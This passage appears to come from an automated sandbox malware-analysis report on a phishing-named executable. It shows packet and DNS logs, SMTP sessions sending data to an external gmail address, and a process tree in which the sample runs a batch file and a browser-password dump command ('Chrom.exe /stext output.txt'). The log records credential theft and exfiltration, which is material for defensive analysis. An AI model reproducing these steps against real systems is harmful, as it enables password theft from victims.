                                                                                                                                                      Jan 8, 2025 17:57:11.699771881 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.701473951 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701483011 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701530933 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.701559067 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701610088 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701611996 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.701618910 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701641083 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701659918 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.701683998 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.701697111 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701719999 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.701740980 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.701755047 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.705136061 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.705202103 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706171036 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706219912 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706394911 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706449986 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706481934 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706515074 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706543922 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706566095 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706605911 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706659079 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706669092 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706700087 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706711054 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706723928 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706743956 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706753016 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706770897 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706794024 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706804037 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706814051 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706832886 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706852913 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:57:11.706886053 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706896067 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706940889 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706949949 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.706959009 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.709964037 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.710911989 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.710922003 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711033106 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711050034 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711060047 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711070061 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711077929 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711132050 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711142063 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711174965 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711249113 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711322069 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711332083 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711345911 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711361885 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711450100 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711460114 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711520910 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711529970 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711638927 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711647987 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711695910 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711704969 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711755037 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711764097 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711782932 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711793900 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711812973 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711822033 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711870909 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711879969 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711885929 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711889982 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711932898 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711941957 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711950064 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711960077 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711985111 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.711994886 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.712040901 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.712050915 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.712059021 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:11.712069035 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:12.301786900 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:57:12.343686104 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:29.704988003 CET49733587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:29.709851980 CET5874973377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:29.925622940 CET5874973377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:29.925815105 CET49733587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:29.930893898 CET5874973377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:29.930953979 CET49733587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:41.377203941 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:41.382258892 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:41.594980955 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:41.596363068 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:41.601494074 CET5874973677.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:41.601577044 CET49736587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:49.705101013 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:49.710005999 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:49.935431004 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:49.935664892 CET49743587192.168.2.477.245.158.126
                                                                                                                                                      Jan 8, 2025 17:58:49.940973997 CET5874974377.245.158.126192.168.2.4
                                                                                                                                                      Jan 8, 2025 17:58:49.941056967 CET49743587192.168.2.477.245.158.126

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 8, 2025 17:56:49.677092075 CET6495253192.168.2.41.1.1.1
                                                                                                                                                      Jan 8, 2025 17:56:49.796756029 CET53649521.1.1.1192.168.2.4

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Jan 8, 2025 17:56:49.677092075 CET192.168.2.41.1.1.10xdea3Standard query (0)mail.lmd.com.trA (IP address)IN (0x0001)false

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Jan 8, 2025 17:56:49.796756029 CET1.1.1.1192.168.2.40xdea3No error (0)mail.lmd.com.tr77.245.158.126A (IP address)IN (0x0001)false

                                                                                                                                                      SMTP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                      Jan 8, 2025 17:56:50.490931034 CET5874973377.245.158.126192.168.2.4220 WIN-9PI0701AIBV.home ESMTP MailEnable Service, Version: 10.34-- ready at 01/08/25 19:56:50
                                                                                                                                                      Jan 8, 2025 17:56:50.491781950 CET49733587192.168.2.477.245.158.126EHLO 992547
                                                                                                                                                      Jan 8, 2025 17:56:50.712296963 CET5874973377.245.158.126192.168.2.4250-home [8.46.123.189], this server offers 5 extensions
                                                                                                                                                      250-AUTH LOGIN
                                                                                                                                                      250-SIZE 40960000
                                                                                                                                                      250-HELP
                                                                                                                                                      250-AUTH=LOGIN
                                                                                                                                                      250 STARTTLS
                                                                                                                                                      Jan 8, 2025 17:56:50.713506937 CET49733587192.168.2.477.245.158.126AUTH login eXVrc2VsLmd1bG51ckBsbWQuY29tLnRy
                                                                                                                                                      Jan 8, 2025 17:56:50.934197903 CET5874973377.245.158.126192.168.2.4334 UGFzc3dvcmQ6
                                                                                                                                                      Jan 8, 2025 17:56:51.170416117 CET5874973377.245.158.126192.168.2.4235 Authenticated
                                                                                                                                                      Jan 8, 2025 17:56:51.173548937 CET49733587192.168.2.477.245.158.126MAIL FROM:<yuksel.gulnur@lmd.com.tr>
                                                                                                                                                      Jan 8, 2025 17:56:51.393857956 CET5874973377.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:56:51.394082069 CET49733587192.168.2.477.245.158.126RCPT TO:<blueskyhomeshouses@gmail.com>
                                                                                                                                                      Jan 8, 2025 17:56:51.687064886 CET5874973377.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:56:51.702529907 CET49733587192.168.2.477.245.158.126DATA
                                                                                                                                                      Jan 8, 2025 17:56:51.928791046 CET5874973377.245.158.126192.168.2.4354 Start mail input; end with <CRLF>.<CRLF>
                                                                                                                                                      Jan 8, 2025 17:56:52.115139008 CET49733587192.168.2.477.245.158.126.
                                                                                                                                                      Jan 8, 2025 17:56:52.713699102 CET5874973377.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:57:01.993386030 CET5874973677.245.158.126192.168.2.4220 WIN-9PI0701AIBV.home ESMTP MailEnable Service, Version: 10.34-- ready at 01/08/25 19:57:01
                                                                                                                                                      Jan 8, 2025 17:57:01.993741035 CET49736587192.168.2.477.245.158.126EHLO 992547
                                                                                                                                                      Jan 8, 2025 17:57:02.211127043 CET5874973677.245.158.126192.168.2.4250-home [8.46.123.189], this server offers 5 extensions
                                                                                                                                                      250-AUTH LOGIN
                                                                                                                                                      250-SIZE 40960000
                                                                                                                                                      250-HELP
                                                                                                                                                      250-AUTH=LOGIN
                                                                                                                                                      250 STARTTLS
                                                                                                                                                      Jan 8, 2025 17:57:02.211616039 CET49736587192.168.2.477.245.158.126AUTH login eXVrc2VsLmd1bG51ckBsbWQuY29tLnRy
                                                                                                                                                      Jan 8, 2025 17:57:02.429742098 CET5874973677.245.158.126192.168.2.4334 UGFzc3dvcmQ6
                                                                                                                                                      Jan 8, 2025 17:57:02.647659063 CET5874973677.245.158.126192.168.2.4235 Authenticated
                                                                                                                                                      Jan 8, 2025 17:57:02.686372995 CET49736587192.168.2.477.245.158.126MAIL FROM:<yuksel.gulnur@lmd.com.tr>
                                                                                                                                                      Jan 8, 2025 17:57:02.952480078 CET5874973677.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:57:02.953524113 CET49736587192.168.2.477.245.158.126RCPT TO:<blueskyhomeshouses@gmail.com>
                                                                                                                                                      Jan 8, 2025 17:57:03.172651052 CET5874973677.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:57:03.172799110 CET49736587192.168.2.477.245.158.126DATA
                                                                                                                                                      Jan 8, 2025 17:57:03.393277884 CET5874973677.245.158.126192.168.2.4354 Start mail input; end with <CRLF>.<CRLF>
                                                                                                                                                      Jan 8, 2025 17:57:03.415971994 CET49736587192.168.2.477.245.158.126437vvDd6Yx37VZuP
                                                                                                                                                      CVva3cVtLq8Al3skyhoiQwUnCjzMnJG359nJHrR9Twv8z+5f/IgsZin9lfe//kjvP+E9
                                                                                                                                                      s/8AoZ9N/wDBPcf/AByj/hPbP/oZ9N/8E9x/8crzS/s0XT2VIZUlsZvKl82DypGR+VLr
                                                                                                                                                      k4IIYdTwVrY1VYbnUNfsGs7SOO0QyW8kNukbRkMowSoG4Hdj5s9jQ8DQ0tf/AMl8v7vn
                                                                                                                                                      caxtfrb/AMm8/wC95WOz/wCE9s/+hn03/wAE9x/8co/4T2z/AOhn03/wT3H/AMcrg7jw
                                                                                                                                                      lb2t3FbS6vAJd7JMoaIkMFJwo8zJyRt+fZyR6086FD/wjk00olt4rS9kE00tqFnxsTap
                                                                                                                                                      Td3Y9C2BknNL6phdLSevkv8A5EaxeKvZxS+b/wDkjuf+E9s/+hn03/wT3H/xyj/hPbP/
                                                                                                                                                      AKGfTf8AwT3H/wAcrgr7QtMNxGbe5nit4tPjurhjBluQoBUb+SxYZGQB6moD4etI4bi6
                                                                                                                                                      m1J1tI1hdGS23O6yBsfLuABG3kZx156ZawWGavd/cv8A5El4zFdl979f5j0T/hPbP/oZ
                                                                                                                                                      9N/8E9x/8co/4T2z/wChn03/AME9x/8AHK851HS1hhNtlPMsbjyZZVTbvjflHPfI5Bz6
                                                                                                                                                      qKuloZfEVxoLWNrHZI8kCkW6+am3OJDJjcTkZOTjrxik8DQtdX7/AGdv/AfMaxte9nbo
                                                                                                                                                      vtbu/wDe8mdz/wAJ7Z/9DPpv/gnuP/jlH/Ce2f8A0M+m/wDgnuP/AI5XmjaCQZQLnJj0
                                                                                                                                                      9L37nXds+Xr/ALfX26Vo2vhqxXWI7aa9km+z3cUF5GINoyxxhG35I3cEnacHIB6U5YLC
                                                                                                                                                      pX5n9y/+REsbin9lfe//AJI7r/hPbP8A6GfTf/BPcf8Axyj/AIT2z/6GfTf/AAT3H/xy
                                                                                                                                                      uAi8NWl0l1cpqS29sLh4YPP8uMkqATu3SDAGQPl3H2qHSY7RfDWr3LjN2Gjij3W6yBQ2
                                                                                                                                                      7oWPBOOoGRjjqcH1HDtXi29ui6/9uj+u4lStJLr1fTf7R6L/AMJ7Z/8AQz6b/wCCe4/+
                                                                                                                                                      OUf8J7Z/9DPpv/gnuP8A45XnzeF4TeGzi1BmuIbmK2uQ0GFQu23KHd8wB9QtUrbSLe71
                                                                                                                                                      86bFesIgHzO8OPuKWPygnj5fXPt2prA4ZptSemuy/wDkSXjcUnZxXbd//JHp3/Ce2f8A
                                                                                                                                                      0M+m/wDgnuP/AI5R/wAJ7Z/9DPpv/gnuP/jlefQeGIbqSKSDUD9he1a5MssaRuoD7CuG
                                                                                                                                                      fbndjq4GD68UsfhQT3aRwajFJCzujTAKVUgLtBKsRyXVeDwc9cUvqeE/mf3L/wCRGsZi
                                                                                                                                                      3ryr73/8kegf8J7Z/wDQz6b/AOCe4/8AjlH/AAntn/0M+m/+Ce4/+OV5adGl/tKw09ZF
                                                                                                                                                      +0Xax5DDAjLngH8Cp/GtCDw5aXk8X2XU5Gt2kljkkkttrIUQvkKGOQQPUH2qpYDDRV3J
                                                                                                                                                      /cv/AJEUcdipOyivvf8A8kehf8J7Z/8AQz6b/wCCe4/+OUf8J7Z/9DPpv/gnuP8A45XC
                                                                                                                                                      aNpGnrdQSS3LSm4guJYIZLYYZFVwCx3Ha2VJAAPTrUa+FE8mxEmpQpcXJhzFmMlVkIxg
                                                                                                                                                      b95IDAkFQOvPrDweFUrNv7l5/wB3yK+uYrlukvvfl/e8zv8A/hPbP/oZ9N/8E9x/8co/
                                                                                                                                                      4T2z/wChn03/AME9x/8AHK8tWA2+t+Rp+LxkYqpngXBIHJKkkYHJyeMDJArckmtIfMvL
                                                                                                                                                      a1sriQ3FvbS/uFaJjsJk2LjA3MOqgdOMZqpYCirWu7/4f/kRLH1teayt/i6f9vHbf8J7
                                                                                                                                                      Z/8AQz6b/wCCe4/+OUf8J7Z/9DPpv/gnuP8A45XAXccVja6pbTQWwtUeSGzJiXzpHEn3
                                                                                                                                                      g2N20AEHnb261Drht7ywhvrExrarKYfK+xxwujbQeSpJcHnknOe3NKOAoya3s/T/AORH
                                                                                                                                                      LHVo32uvX/5L+ux6L/wntn/0M+m/+Ce4/wDjlH/Ce2f/AEM+m/8AgnuP/jlefN4ZtoLO
                                                                                                                                                      2mu9VjhklWN2jAjYqr4xhRJvJGQT8o4zgnAy2LwuTq09hPdrE9pB5t2xCgRtkDapZlVj
                                                                                                                                                      8y8kqOuM8ZPqWF/mf3L/AORF9dxWnurW3V9dvtHrmk6lfa7atdabrWmzwo5jZv7MlXDA
                                                                                                                                                      A4w0oPQir/ka9/0EtN/8F7//AB6sH4bWqWWiX9vHOk6JfNtkRlIYGOM/wkjPPOCee5rs
                                                                                                                                                      q8bENU6rjDb0X+R7OHTnTUp7+r/zMvyNe/6CWm/+C9//AI9UF3NrVgkM8t5p80ZuIYnR
                                                                                                                                                      LN0JDyKhwfNOCN2eh6VZm1u0tLu4t71ja+VH5qSSkBZUAGSp9jwR16cYIqrqVy15oVtc
                                                                                                                                                      Nbywb721IjlGGA+0x4JHbIwcHkZ55rOnNymk0vuRpUgowbTf3s3K4D4tf8i/p3/X+P8A
                                                                                                                                                      0XJXf1wHxa/5F/Tv+v8AH/ouSnhv40fUzxv+7T9GeYxDirSVWiPAqwlfXwZ+fVCWim0V
                                                                                                                                                      oZCk0hNFBoASiikNAwooooGFJmlpKACiikNAwoooNACUUUUDEoooNAAaSl7UlMYlFFBo
                                                                                                                                                      ASiiigYlFFFAwpKDRQAhoooNMYlB6UUHpQMSiiigYlFFFACUlLSUDENFBooGBpKU0lAC
                                                                                                                                                      UlLSGgoKSlpKBhSUtJQMSg0UGgBKKKSgYUlLSUDEooooGJSGlpKBgaSlNJQMSg0UGgBp
                                                                                                                                                      ooNFMYGkzSmm0hh/npSGlNJQUFIaWkPSgBKSlpKYwpDS0lBQGkNBoNAISiiigYnakpTS
                                                                                                                                                      UDDvSdKKKBoQ0HpQTSUDEoP0oooGJS80d6SgYGkNGeaM80DE/WijPFH6fWgYdKSjGeKT
                                                                                                                                                      OPWgApM0tID70FBk560hyaBjtQeaBhnP1pO/al/SkzQAHpxSdOaM5H+NIaBi0mcjijJ6
                                                                                                                                                      fpRQAh/yaKO3T8qDQM9Bes/Uf+POb/cP8q0HrP1H/jzm/wBw/wAq5avws+Zw/wAa9T6K
                                                                                                                                                      T/Vr9BVPVdKh1e0WGWSWF45FlhnhYCSGRejKSCM+xBBBIIIJFXE/1a/QU6vjD9NOO1rw
                                                                                                                                                      lK+h3cdtc3l9qd3c2jTXc8kaymOOZG42hUUKu4gKoycnknm63g23e3JfU9RbUPtQuxqW
                                                                                                                                                      6ITiQJ5Y4CeXjZlduzGCeM810lFH9fl/kFzBl8K29zFfLd397cy32n/2fPM5jVjHmQ7g
                                                                                                                                                      FQKG/eHtjgcdc6djYCwE4W5uJllkDgTPuEfyqu1fRflzj1J9at0UBuFZfiX/AJFXWP8A
                                                                                                                                                      rym/9ANalRXNvFeWs1rOm+GZGjkXJGVIwRkc9KqEuWSb6Ezi5RaXUwvGWiahrul20OmX
                                                                                                                                                      EdvcwXSzrI7suMKw4KgnOSK5CTwL4ulkL/b9HRmV1YxRCPduBVs7Yhk4J5PIycV3v9gW
                                                                                                                                                      f/PbUv8AwZ3H/wAXR/YFn/z21L/wZ3H/AMXXbRxfso8kXp5xX+ZxVcJ7WfPJa+Un0+R5
                                                                                                                                                      5bfDrxRaRQrBfaYjQTedFIJH3IxGDj5OhwMj2+tSS+AfFc08Msl5oreSGEcfkjy1z1Pl
                                                                                                                                                      +VtyfXGenpXf/wBgWf8Az21L/wAGdx/8XR/YFn/z21L/AMGdx/8AF1r/AGlNu7f/AJKv
                                                                                                                                                      8zJZbBKyX/kz/wAjgh4G8X/vg2oaRKsz+YyTRiRQ2MZVWiIXj
                                                                                                                                                      Jan 8, 2025 17:57:03.989347935 CET5874973677.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:57:10.357425928 CET5874974377.245.158.126192.168.2.4220 WIN-9PI0701AIBV.home ESMTP MailEnable Service, Version: 10.34-- ready at 01/08/25 19:57:10
                                                                                                                                                      Jan 8, 2025 17:57:10.357681990 CET49743587192.168.2.477.245.158.126EHLO 992547
                                                                                                                                                      Jan 8, 2025 17:57:10.577863932 CET5874974377.245.158.126192.168.2.4250-home [8.46.123.189], this server offers 5 extensions
                                                                                                                                                      250-AUTH LOGIN
                                                                                                                                                      250-SIZE 40960000
                                                                                                                                                      250-HELP
                                                                                                                                                      250-AUTH=LOGIN
                                                                                                                                                      250 STARTTLS
                                                                                                                                                      Jan 8, 2025 17:57:10.578221083 CET49743587192.168.2.477.245.158.126AUTH login eXVrc2VsLmd1bG51ckBsbWQuY29tLnRy
                                                                                                                                                      Jan 8, 2025 17:57:10.798043966 CET5874974377.245.158.126192.168.2.4334 UGFzc3dvcmQ6
                                                                                                                                                      Jan 8, 2025 17:57:11.024409056 CET5874974377.245.158.126192.168.2.4235 Authenticated
                                                                                                                                                      Jan 8, 2025 17:57:11.024599075 CET49743587192.168.2.477.245.158.126MAIL FROM:<yuksel.gulnur@lmd.com.tr>
                                                                                                                                                      Jan 8, 2025 17:57:11.244849920 CET5874974377.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:57:11.245023966 CET49743587192.168.2.477.245.158.126RCPT TO:<blueskyhomeshouses@gmail.com>
                                                                                                                                                      Jan 8, 2025 17:57:11.466562986 CET5874974377.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:57:11.466749907 CET49743587192.168.2.477.245.158.126DATA
                                                                                                                                                      Jan 8, 2025 17:57:11.688465118 CET5874974377.245.158.126192.168.2.4354 Start mail input; end with <CRLF>.<CRLF>
                                                                                                                                                      Jan 8, 2025 17:57:12.301786900 CET5874974377.245.158.126192.168.2.4250 Requested mail action okay, completed
                                                                                                                                                      Jan 8, 2025 17:58:29.704988003 CET49733587192.168.2.477.245.158.126QUIT
                                                                                                                                                      Jan 8, 2025 17:58:29.925622940 CET5874973377.245.158.126192.168.2.4221 Service closing transmission channel
                                                                                                                                                      Jan 8, 2025 17:58:41.377203941 CET49736587192.168.2.477.245.158.126QUIT
                                                                                                                                                      Jan 8, 2025 17:58:41.594980955 CET5874973677.245.158.126192.168.2.4221 Service closing transmission channel
                                                                                                                                                      Jan 8, 2025 17:58:49.705101013 CET49743587192.168.2.477.245.158.126QUIT
                                                                                                                                                      Jan 8, 2025 17:58:49.935431004 CET5874974377.245.158.126192.168.2.4221 Service closing transmission channel

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:11:56:46
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Quote for new order 2025.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Quote for new order 2025.exe"
                                                                                                                                                      Imagebase:0xe90000
                                                                                                                                                      File size:543'744 bytes
                                                                                                                                                      MD5 hash:11DE9D1BB135ADB354E26BDAD47037C9
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      General

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:11:56:47
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:11:56:47
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      General

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:11:56:47
                                                                                                                                                      Start date:08/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\Chrom.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:.\Chrom.exe /stext .\output.txt
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:402'944 bytes
                                                                                                                                                      MD5 hash:2024EA60DA870A221DB260482117258B
